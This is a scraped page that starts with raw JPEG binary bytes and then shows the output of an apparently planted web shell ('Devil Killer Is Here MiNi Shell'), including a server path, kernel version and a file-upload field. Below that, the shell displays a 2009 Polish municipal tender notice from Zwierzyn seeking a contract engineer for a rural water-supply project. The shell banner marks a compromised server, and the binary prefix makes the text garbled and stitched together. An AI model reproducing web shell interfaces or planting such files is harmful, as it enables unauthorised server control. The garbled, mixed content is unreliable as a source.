JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090806/128659-N-2009.html

<p class="kh_header"><b>Zwierzyn: Pełnienie funkcji inżyniera kontraktu zadania pn.: Zwodociągowanie doliny Noteci Etap II i Etap III - Gościmiec, Górecko, Błotno, Rzekcin, Zagaje, Żółwin, Sierosławice realizowanego w ramach Programu Rozwoju Obszarów Wiejskich</b><br>
<b>Numer ogłoszenia: 128659 - 2009; data zamieszczenia: 06.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Zwierzyn , ul. Wojska Polskiego 8, 66-542 Zwierzyn, woj. lubuskie, tel. 095 7617580.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zwierzyn.pl;www.eurzad.zwierzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inżyniera kontraktu zadania pn.: Zwodociągowanie doliny Noteci Etap II i Etap III - Gościmiec, Górecko, Błotno, Rzekcin, Zagaje, Żółwin, Sierosławice realizowanego w ramach Programu Rozwoju Obszarów Wiejskich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Nazwa zamówienia.
Pełnienie funkcji Inżyniera Kontraktu zadania pn.: Zwodociągowanie doliny Noteci Etap II i Etap III - Gościmiec, Górecko, Błotno, Rzekcin, Zagaje, Żółwin, Sierosławice realizowanego w ramach Programu Rozwoju Obszarów Wiejskich. 
2. Zakres robót budowlanych objętych przedmiotem zamówienia.
2.1. Etap II
Projektowana sieć wodociągowa przebiega wzdłuż poboczy dróg pomiędzy miejscowościami Gościmiec, Błotno, Górecko i Żółwin w Gminie Zwierzyn, wraz przyłączeniem gospodarstw do sieci wodociągowej.
a)sieć wodociągowa 
Sieć wodociągową przesyłową zaprojektowano z rur PE 100 SDR 11 o średnicach: o 225-20,5; 
o 160-14,6; o 110-10 i o 90-8,2 mm.
Łączna długość projektowanej sieci wodociągowej wynosi:
o 225-20,5 mm - 2.793,0 m,
o 160-14,6 mm - 1.337,0 m,
o 110-10 mm - 11.609,0 m,
o 90-8,2 mm - 10.097 m.
Całkowita długość sieci przesyłowej wynosi - 25.836,0 m
Głębokość ułożenia wodociągu 1,50 - 1,70 m.
Na łukach przewodu wodociągowego zaprojektowano betonowe bloki oporowe. W celu zabezpieczenia przeciwpożarowego zaprojektowano 96 hydrantów. Hydranty podziemne z żeliwa sferoidalnego z zamknięciem kulowym Dn 80 mm.
b)przyłącza wodociągowe
Przyłącza wodociągowe do gospodarstw wiejskich zaprojektowano z rur PE o 40-3,7 i o 32-3,0 mm.
Do gospodarstw wiejskich zaprojektowano łącznie 138 przyłączy wodociągowych w tym: typu C - 11 1 szt. i typu D - 27 szt.
Łączna długość projektowanej sieci przyłączy wodociągowych wynosi:
o 40-3,7 mm - 1.473,0 m,
o 32-3,0 mm - 3.515,0 m.
Całkowita długość przyłączy wodociągowych wynosi - 4988 m.
Głębokość ułożenia przewodu 1,50 - 1,70 m. 
Na łukach przewodu wodociągowego zaprojektowano betonowe bloki oporowe.
Zakończenie każdego przyłącza do budynku stanowi wodomierz skrzydełkowy (o 20 - 115 szt., o 25 - 23 szt.) oraz po dwa zawory odcinające kulowe i jeden zawór antyskażeniowy o odpowiedniej średnicy, oraz konsola wodomierzowa 1 szt. 
c)przejścia pod przeszkodami
Przejścia wodociągu magistralnego i przyłączy wodociągowych pod przeszkodami wykonano metodą przewiertu.
Na kolektorze przesyłowym należy wykonać przewierty z rur stalowych o następujących średnicach:
o 273-5,6 mm - 26,0 m,
o 219,1-5,6 mm -110,0 m,
o 159,0-4,5 mm - 62,0 m,
Rury osłonowe zaprojektowano z rur PE o następujących średnicach:
o 280-25,4 mm -17,0 m,
o 200-18,2 mm - 3,0 m,
o 160-14,6 mm - 78,0 m,
o 125-11,4 mm - 39,0 m,
Łączna długość rur osłonowych wynosi:
Rury stalowe -198 m,
Rury PE -137 m.
Na przekraczanych przeszkodach terenowych przy wykonywaniu przyłączy wodociągowych zaprojektowano stalowe rury ochronne O 63 mm:
Długość 7,0 m - 8 szt.
Długość 9,0 m -1 szt.
Długość 12,0 m - 3 szt. 
Długość 11,0 m - 1 szt. 
2.2. Etap III 
Zamówienie obejmuje wykonanie sieci wodociągowej z rur PE 100 SDR 11 PN16 o średnicy zewnętrznej 100 mm, przyłączy wodociągowych z rur PE 100 SDR 11 PN16 o średnicy zewnętrznej 32, 40, 50, 63 mm w poboczu pasów drogowych, w drogach, w gruntach prywatnych, ANR, Skarbu Państwa oraz zlokalizowanie nawiertek umożliwiających wykonanie włączeń do istniejących i projektowanych przyłączy wodociągowych.
Zakres obejmuje rozbudowę istniejącego wodociągu w m. Sierosławice i połączenie z zaprojektowanym wodociągiem w m. Gościmiec. Zaprojektowano wodociąg w miejscowościach: Gościmiec - Błotno; Sierosławice - Rzekcin - Zagaje - Żółwin - Gościmiec.
Do wykonania łącznie 31.251,5 m sieci wodociągowej oraz 110 szt. przyłączy dla przyłączenia do sieci wodociągowej 118 rodzin i cmentarza w Żółwinie.
Na terenie inwestycji nawierzchnie asfaltowe posiadają drogi: droga wojewódzka nr 157 oraz droga powiatowa 1360F. Pozostałe drogi mają nawierzchnię gruntową nieutwardzoną.
Na terenie inwestycji występują istniejące przyłącza wodociągowe z własnych ujęć wody o złej jakości, oraz istniejąca kanalizacja umożliwiająca odpływ ścieków do szamb. Ponadto na trasie projektowanego wodociągu miejscami ułożona jest sieć elektroenergetyczna i telekomunikacyjna.
Wpływ inwestycji na środowisko
Budowa sieci wodociągowej nie wpłynie pogarszająco na środowisko naturalne.
Na terenie planowanej inwestycji, w granicach i w bezpośrednim sąsiedztwie przebiegu sieci wodociągowej w m. Błotno, zlokalizowano 7 stanowisk archeologicznych według uzgodnienia znak: ZA.T.Wit.431-174-3-06 z dnia 16.11.2006 r., oraz decyzji znak: ZA.T.Wit.431-123-1-06 z dnia 16.11.2006r. Natomiast w pozostałych miejscowościach tj. Gościmiec, Rzekcin, Sierosławice, Zagaje, Żółwin, nie występują żadne przedmioty, obiekty zabytkowe, nawarstwienia kulturowe, które podlegałyby ochronie zabytków i opiece nad zabytkami w rozumieniu ustawy z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami (Dz. U. z 2003 r., nr 162 poz. 1568 ze zm.). W przypadku odkrycia podczas prac ziemnych przedmiotów zabytkowych, obiektów ruchomych lub nawarstwień kulturowych, Inwestor zobowiązany jest niezwłocznie powiadomić o tym Wojewódzkiego Konserwatora Zabytków w Gorzowie Wlkp. W przypadku dokonania podczas realizacji inwestycji odkrycia kopalnych szczątków roślin lub zwierząt Inwestor zobowiązany jest niezwłocznie powiadomić o tym fakcie Wojewodę Lubuskiego.
3. Lokalizacja zadania inwestycyjnego.
Adres: Gmina Zwierzyn
Obręb Górecko, 
Obręb Błotno,
Obręb Żółwin, 
Obręb Gościmiec,
  
4. Szczegółowo zakres obowiązków Inżyniera Kontraktu:

Inżynier Kontraktu będzie wykonywał swoje obowiązki i uprawnienia polegające na obsłudze procesu inwestycyjnego realizowanego z udziałem funduszy Unii Europejskiej w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007-2013.
Do obowiązków Inżyniera Kontraktu należy w szczególności:
1.Przygotowanie, zgodnie z wymogami UE, przedkładanie Zamawiającemu do sygnowania i składanie do Instytucji Pośredniczącej:
a)comiesięcznych harmonogramów płatności na kolejnych sześć miesięcy,
b)prognozy wydatków na bieżący rok budżetowy oraz na rok następny,
c)spełniających wymogi formalne Wniosków beneficjenta o płatność zgodnie z zestawieniem planowanych wydatków w ramach Projektu wraz z wymaganymi załącznikami,
d)sprawozdań okresowych, rocznych oraz końcowego z realizacji Projektu,
e)wszystkich innych dokumentów i informacji związanych z realizacją Projektu, których Instytucja Pośrednicząca zażąda,
2.Udział w przekazaniu placu budowy Wykonawcy robót.
3.Uzyskanie od wykonawcy robót harmonogramu przedstawiającego cykl realizacji inwestycji i planu płatności po jego uprzednim uzgodnieniu z Zamawiającym.
4.Kierowanie realizacją projektu, sporządzanie i przechowywanie dokumentacji kontraktowej w okresie trwania budowy oraz przekazanie jej Zamawiającemu po zakończeniu i rozliczeniu inwestycji.
5.Zapewnienie w imieniu Zamawiającego pełnej usługi nadzoru inwestorskiego budowy i administracji projektu tzn. kontrolę jakości i ilości, monitorowanie postępu i kosztów.
6.Zapewnienie terminowego i prawidłowego zakończenia projektu,
7.Dostarczenie wykonawcy otrzymanego od Zamawiającego projektu budowlanego oraz ewentualnych rozwiązań dodatkowych i zamiennych zatwierdzonych przez Zamawiającego oraz współpraca z nadzorem autorskim.
8.Wydawanie zgody na wykonanie robót dodatkowych i zamiennych po uzyskaniu aprobaty Zamawiającego.
9.Rozwiązywanie problemów i sporów powstałych w trakcie realizacji robót.
10.Wizytowanie budowy, sprawdzanie obmiarów, nadzorowanie i odbiór robót.
11.Kontrola i aprobata dokumentów roszczeniowych Wykonawcy, aprobowanie wydłużenia czasu trwania kontraktu oraz zwiększenia ceny kontraktowej z uwzględnieniem regulacji UE, po uzyskaniu akceptacji ze strony Zamawiającego.
12.Wykonywanie, stosownie do przepisów ustawy - Prawo budowlane zadań:
a) inspektora nadzoru inwestorskiego (art.25 i 26 ustawy - Prawo budowlane),
b) koordynatora czynności nadzoru inwestycyjnego (art. 27 ustawy - Prawo budowlane),
c) inwestora zastępczego (art. 18 ustawy - Prawo budowlane),
13.W imieniu zamawiającego egzekwowanie od Projektanta jego obowiązków wynikających z art.20 i 21 ustawy - Prawo budowlane,
14.Inicjowanie i przewodniczenie cotygodniowym oraz miesięcznym zebraniom w miejscu realizacji projektu - na temat postępów robót, a także sporządzanie i wydawanie protokołów z zebrań.
15.Przeprowadzenie inspekcji końcowej i przygotowanie certyfikatu przejęcia, wykazu wad i innych dokumentów odpowiadających warunkom kontraktu.
16.Uczestnictwo w ewentualnych kontrolach w zakresie prawidłowości realizacji Projektu dokonywanych przez Instytucję Pośredniczącą, Instytucję Zarządzającą oraz inne podmioty uprawnione do ich przeprowadzania.
17.Wykonanie innych prac i usług przewidzianych obowiązującym prawem.
18.Współdziałanie z Zamawiającym w celu uzyskania pozwolenia na użytkowanie obiektu.
19.Opracowanie protokołu przejęcia środka trwałego na druku OT.
20.Obsługa okresu gwarancyjnego.
6. Gwarancja i rękojmia.
Przez okres gwarancji i rękojmi udzielonej przez Wykonawcę robót tj.:
a)Gwarancja na okres minimum 3 lat od daty odbioru końcowego przedmiotu zamówienia. 
b)Rękojmia za wady na okres minimum 3 lata i 3 miesiące od daty odbioru końcowego przedmiotu zamówienia.
Oferty zawierające krótsze terminy gwarancji i rękojmi za wady, będą przez Zamawiającego odrzucone, jako niespełniające warunków Specyfikacji Istotnych Warunków Zamówienia.
74260000-9, 74262000-3, 74264000-7,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.26.00.00-9, 74.26.20.00-3, 74.26.40.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Wniesienie i zwrot wadium 
a)Wadium w wysokości 4.000,00 zł słownie: cztery tysiące złotych może być wnoszone w jednej lub kilku formach:
1)pieniądzu,
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
3)gwarancjach bankowych,
4)gwarancjach ubezpieczeniowych,
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt. 4 lit. b ustawy z dnia 9.11.2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r., nr 42, poz. 275).  
b)Wadium w pieniądzu wpłacać należy na konto Gminy Zwierzyn w Lubusko-Wielkopolski Bank Spółdzielczy Drezdenko Oddział Zwierzyn nr rachunku 31 8362 0005 4200 1384 2000 0050 Dokument przelewu należy opisać: 
Wadium - zwodociągowanie Gminy Zwierzyn - etap II i III
Kopię przelewu należy załączyć do oferty. Zamawiający uzna, że wadium zostało wniesione w terminie, jeżeli do dnia i godziny otwarcia ofert znajdzie się kwota wadium na koncie Zamawiającego. 
c)	Wadium w:
1)	poręczeniach lub gwarancjach bankowych (skok),
2)	gwarancjach ubezpieczeniowych,
3)	poręczeniach
należy złożyć w siedzibie Urzędu Gminy w Zwierzynie, ul. Wojska Polskiego 8 - sekretariat - w godzinach 07.00 - 14.00. Wykonawca otrzyma pokwitowanie złożenia wadium na kopii dokumentu. 
d)	Poręczenia instytucji kredytowych i gwarancje ubezpieczeniowe obejmować winny czas związania Wykonawcy ofertą.
e)	Termin złożenia wadium - do dnia 18.08.2009 r. do godz. 10.00.
f)	Oferta, która nie będzie zabezpieczona jedną z w / w form wniesienia wadium zostanie przez Zamawiającego uznana za nieważną.
g)	Zgodnie z postanowieniami art. 42 ustawy - Prawo zamówień publicznych Zamawiający dokonuje zwrotu wadium w n / w wypadkach:
1)	Niezwłocznie, jeżeli:
- upłynął termin związania ofertą,
- zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy,
- Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia,
2)	na pisemny wniosek Wykonawcy w ciągu 3 dni od dnia złożenia wniosku, jeżeli:
- wycofał ofertę przed upływem terminu składania ofert,
- który został wykluczony z postępowania,
- którego oferta została odrzucona, 
złożenie wniosku powoduje utratę prawa do wniesienia protestu.
h)	Dyspozycje w zakresie zwrotu wadium Wykonawcom, których oferty nie zostaną wybrane Zamawiający przekaże niezwłocznie po podpisaniu umowy z Wykonawcą, którego oferta została wybrana, lecz nie później niż dnia następnego po zakończeniu okresu związania ofertą.
i)	Wadium wniesione w pieniądzu, Zamawiający zwróci wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.
2.	Zatrzymanie wadium.
a)	Zgodnie z art. 46. ust. 5 ustawy - Prawo zamówień publicznych utracić wadium na rzecz Zamawiającego może Wykonawca, którego oferta została wybrana, jeżeli:
1)	odmówi podpisania umowy na warunkach określonych w ofercie, 
2)	nie wniósł zabezpieczenia należytego wykonania umowy,
3)	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
b)	Wycofanie oferty po upływie terminu składania ofert powoduje utratę wadium.
c)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Oferty, które nie będą spełniały warunków podanych w punkcie 2 i 3 będą przez zamawiającego odrzucone, jako niespełniające wymagań Specyfikacji Istotnych Warunków Zamówienia.
2.Warunki wymagane od Wykonawcy, które bezwzględnie musi spełnić, aby nie został wykluczony z udziału w postępowaniu, a oferta była uznana za ważną i podlegała ocenie przez Komisję Przetargową:
a)wykonanie usług Inżyniera Kontraktu w 100% własnymi siłami - bez udziału podwykonawców - nie dotrzymanie tego warunku spowoduje odrzucenie oferty,
3.O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia:
a)zrealizowali w ostatnich 3 latach pięć usług Inżyniera Kontraktu-Inżyniera Projektu- Inwestora zastępczego w tym jedną sieć wodociągową współfinansowaną ze środków Unii Europejskiej np. ZPORR o wartości  ok. 3.000.000 złotych netto i złożoności porównywalnej z przedmiotem zamówienia, co potwierdzą dokumentami stwierdzającymi , że usługi te zostały wykonane należycie.
W przypadku składania oferty wspólnej, powyższy warunek musi być spełniony w całości przez Lidera konsorcjum.
b)dysponują osobami posiadającymi uprawnienia niezbędne do wykonania przedmiotu zamówienia, wymagane przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane oraz należącymi do właściwej Okręgowej Izby Inżynierów Budownictwa. w tym:                                          
-jedna osoba na stanowisku inspektora nadzoru sieci i instalacji sanitarnych posiadająca min. 5 lat doświadczenia zawodowego, 
-posiadać uprawnienia budowlane do nadzorowania / kierowania robotami budowlanymi branży sanitarnej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do kierowania robotami budowlanymi.
-przynależność do właściwej izby samorządu zawodowego potwierdzoną stosownym zaświadczeniem wydanym przez tę jednostkę.
c) dysponować następującymi osobami  
-jedna osoba na stanowisko specjalisty ds. rozliczeń finansowych - osoba ta musi posiadać wykształcenie ekonomiczne
-jedna osoba na stanowisko specjalisty ds. prowadzenia sprawozdawczości - osoba ta musi posiadać doświadczenie w sprawozdawczości projektów dofinansowanych ze środków Unii Europejskiej
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
a)posiadają polisę lub inny dokument ubezpieczeniowy potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 2.000.000,00 zł
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
4.Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły: spełnia - nie spełnia.
5.Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Formularz Oferty - załącznik nr 1 do Specyfikacji Istotnych Warunków Zamówienia - wypełniony lub przepisany zgodnie z zasadami podanymi w Rozdziale XIV punkt 2 i 3.  
2.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
W przypadku składania oferty wspólnej ww. zaświadczenie składa każdy z wykonawców składających ofertę wspólną.
W przypadku składania oferty przez spółkę cywilną wykonawca musi złożyć oddzielne zaświadczenia dla każdego ze wspólników.
4.Zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
W przypadku składania oferty wspólnej ww. zaświadczenie składa każdy z Wykonawców składających ofertę wspólną.
W przypadku składania oferty przez spółkę cywilną wykonawca musi złożyć oddzielne zaświadczenia dla każdego ze wspólników.
5.Oświadczenie Wykonawcy, że nie podlega wykluczeniu z postępowania na podstawie art. 22 i art. 24 ustawy - Prawo zamówień publicznych (na formularzu lub według wzoru formularza stanowiącego załącznik nr 2 do Specyfikacji).
W przypadku składania oferty wspólnej ww. oświadczenie składa każdy z Wykonawców składających ofertę wspólną.
W przypadku składania oferty przez spółkę cywilną wykonawca musi złożyć oddzielnie oświadczenia dla każdego ze wspólników.                                 
6.Wykaz osób i podmiotów, które będą wykonywać zamówienie lub uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nich czynności (na formularzu lub według wzoru formularza stanowiącego załącznik nr 3 do Specyfikacji - POTENCJAŁ KADROWY). 
Do formularza należy dołączyć kopie aktualnych uprawnień budowlanych i kopie aktualnych zaświadczeń potwierdzających wpis na listę członków właściwej izby samorządu zawodowego.
7.Wykaz wykonanych w okresie ostatnich 3 lat (lub z okresu prowadzenia działalności, jeżeli jest ona prowadzona przez okres krótszy niż 3 lat) usług odpowiadających swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (na formularzu lub według wzoru formularza stanowiącego załącznik nr 4 do Specyfikacji - DOŚWIADCZENIE ZAWODOWE).
8.W celu potwierdzenia spełniania warunku pkt. 7 Wykonawcy zobowiązani są do przedłożenia kopii dokumentów potwierdzających, że usługi i/lub roboty zostały wykonane należycie tj. referencje lub inne dokumenty np. protokoły odbioru końcowego robót od poprzednich kontrahentów zamówień publicznych.	
9.Polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej w wysokości minimum 2.000.000,00 zł.
10.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
- zamiast dokumentów, o których mowa w pkt. 2, 3 i 4 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c)nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
Dokumenty, o których mowa w ppkt. a i c powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem składania ofert, dokument, o którym mowa w ppkt. b powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem składania ofert.  
